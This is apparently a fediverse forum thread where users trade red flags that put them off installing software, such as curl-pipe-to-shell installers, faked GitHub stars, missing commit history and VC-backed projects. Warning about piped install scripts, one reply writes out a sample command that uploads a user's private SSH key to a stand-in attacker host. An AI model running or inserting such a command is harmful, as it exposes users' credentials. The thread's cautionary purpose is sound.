Have you ever found a GitHub project or anything that seemed nice and tempting to install until you dug a bit deeper?

What are some red flags that should detur anyone from installing and running something?

  • prenatal_confusion@feddit.org
    4·
    6 hours ago

    No stars (although easily manipulated)

    No commit history

    No issue history

    No pr requests (soft no)

    No contributions from people with a active history

    • VitoRobles@lemmy.todayEnglish
      3·
      5 hours ago

      Something I do is if a project has way too many stars, click on a few of the names randomly.

      If those profiles have 0-1 projects, my yellow flag (not red flag) goes up. Because yeah, it’s really easy to buy GitHub stars now.

  • rodneylives@lemmy.worldEnglish
    10·
    12 hours ago

    A rule of thumb I use is how desperate the software is to tell you the weather even when you never asked for it or even set it up to report it.

    • rekabis@lemmy.ca
      1·
      15 minutes ago

      I can’t believe that marketing people are this fucking stupid.

      Like, full-on knuckle-dragging morons.

      They intentionally drive away more paying customers than they could ever “channelize” with this method.

      Because most people realize that prices are only ever hidden for malicious, anti-consumer purposes.

  • sem@piefed.blahaj.zoneEnglish
    19·
    21 hours ago

    If the project maintainer has a policy of “no politics allowed.”

    Rather than a policy more along the lines of “be respectful”

    • VitoRobles@lemmy.todayEnglish
      3·
      5 hours ago

      100%.

      Then you look through their history and it’s them laugh emojiing something like doing a LGBT suicide or some ridiculous shit.

  • Vogi@piefed.socialEnglish
    16·
    21 hours ago

    Something I ran into just now was AI generated Imagery in Docs or as an Icon.
    I am not even that Anti AI as many on here I feel like. But this is a sure fire way to show how much you don’t give a shit about your project. Just use emojis or some shit which is ironically even less work but somehow makes it seem more deliberate.

  • vole@lemmy.worldEnglish
    25·
    1 day ago

    Venture capital funding. The plan is always to do a rug pull. Though if it properly freely licensed and the code is reasonable enough to be forked, it’s less worrying but still risky. It’s better to work with honest people.

  • gera@feddit.nuEnglish
    261·
    1 day ago
    • curl | sh installation method
    • vomit-colored website, vomit-colored developer avatars, or more obvious: AGENTS.MD in the repo
    • compiling yourself is “unsupported”/“not recommended”
    • the official website aggressively advertising the company’s SAAS which makes it look like their opensource software is actually paid product
    • github issues using convoluted template, instead of letting me write freeform text
      • Escape13@slrpnk.net
        2·
        5 hours ago

        Let’s say you curl bash something and it has ie ‘scp ~/.ssh/id_ed25519 badComputerGuy’ in it then you just uploaded your private key to the bad guys. And that’s why ssh keys should be password protected

      • Miaou@jlai.lu
        4·
        8 hours ago

        The real answer is that user-agents can be used to show you one version in your browser and then serve you another one with curl.

        I say “real” because all the idiots talking about “don’t run scripts from the internet!!!” probably forget they don’t decompile every binary they run. E.g. the rustup installer (the tool for managing Rust toolchains) is by default a curl+bash one liner. Why would I worry about them serving me a wrong script when I’m any way about to run their binary blob?

        If you have any doubt about the hosting service (which might or not be the same as the software author!) then avoid piping into bash, but then why would you run their code at all if you distrust them so much? Do you expect github to install a keylogger? Probably not. Some telemetry hook to know whose running the requested script? Possibly someday

      • Nibodhika@lemmy.world
        1·
        7 hours ago

        In THEORY they’re bad because the script could do malicious things and you shouldn’t blindly trust random people on the internet telling you what to execute.

        In practice it’s mostly fearmongering because you’re likely trying to install a binary that could do malicious things anyways. “Mostly” because it is a bit less safe as one could MITM the script more easily or something, but not really by that much.

        You shouldn’t run curl | sh scripts some random person sends you, but running an official script prom an official source is no more dangerous than running a .Deb file from that same source.

      • osanna@lemmy.vgEnglish
        3·
        13 hours ago

        As others have said, you are boldly trusting that the script you’re downloading is safe. ALWAYS examine a script before you pipe to bash. Also, open the script in your browser, the copy paste j to your terminal. It’s entirely possible to change the script based on use agent to display differently when your check in your browser versus when you pipe to bash

      • Saganaki@lemmy.zip
        4·
        15 hours ago

        “Download this shell script from the web and execute it right away.”

        Probably close to 80% of the words in the sentence are wrong.

      • excral@feddit.org
        1·
        15 hours ago

        It forces you to blindly trust that whatever script curl will download is save to run and does exactly what you want / was promised as it will be executed right away.

      • GreenKnight23@lemmy.world
        2·
        20 hours ago

        which makes sense because they don’t maintain packages on the dozens of different package manager repos.

        IMO it’s kind of bogus to knock a project for having a shell install file.

        • aesthelete@lemmy.world
          2·
          5 hours ago

          Eh, I’d be more sympathetic if there weren’t a dozen different alternatives to making this exclusively how people install your software.

          It’s a virus delivery system waiting to happen. Especially now when you have AI that can help you stand up an imposter site quickly and easily.

          • GreenKnight23@lemmy.world
            1·
            13 hours ago

            it’s not the impact to the user having dozens of choices.

            it’s the impact to the developer to having to maintain the packages for dozens of package repo admins that have each their own special requirements for packages that have to be followed. it’s a huge pita that most companies don’t even bother with and just run their own package repo.

            IMO the user isn’t blameless when using an install script. anyone who just blindly runs arbitrary code without reading it is a fool asking to be attacked.

            • aesthelete@lemmy.world
              1·
              4 hours ago

              Exactly, it’s a shift in responsibilities from the developers of a thing to the users of that thing.

              As a grunt at work and a mid-tier “money haver” at best, I’m tired of having everything shift its costs onto me and it’s a red flag that prevents me from installing and running a software package.

              Everything around nowadays does this shift if they can get away with it.

              I have to set limits on what I tolerate to achieve what gain or the world will leave me dead with a giant tire mark across my chest.

  • pHr34kY@lemmy.world
    27·
    1 day ago

    • It’s not already in my distro’s package manager

    • A github project with 1000 open issues and no commits for 3 years.

  • imetators@lemmy.dbzer0.comEnglish
    22·
    1 day ago
    • New post about a promising selfhosted app
    • looks inside
    • em dashes, emojis, release in last 24h with 35 commits since.

    I fucking swear, if only vibe coders would ACTUALLY write up their own posts about THEIR OWN SOFTWARE, many would not act harsh towards them as much as it happens.

    • Vogi@piefed.socialEnglish
      11·
      21 hours ago

      Especially in the homebrew/modding world some even only distribute their stuff over discord. Which is an extra level of stupid. Dont think anything else can beat this.

      • Cantaloupe@lemmy.fedioasis.ccOPEnglish
        2·
        20 hours ago

        Stalker Gamma comes to my mind, for that you had to join a discord in order to access the launcher, that launcher would auto download and install a bunch of mods for Stalker Anomaly into one big modded game.

      • bridgeenjoyer@sh.itjust.works
        5·
        1 day ago

        Sadly way too many niche groups there and also fb for me to delete. I’d have nothing otherwise.

        I just interact as little as possible and never install their software.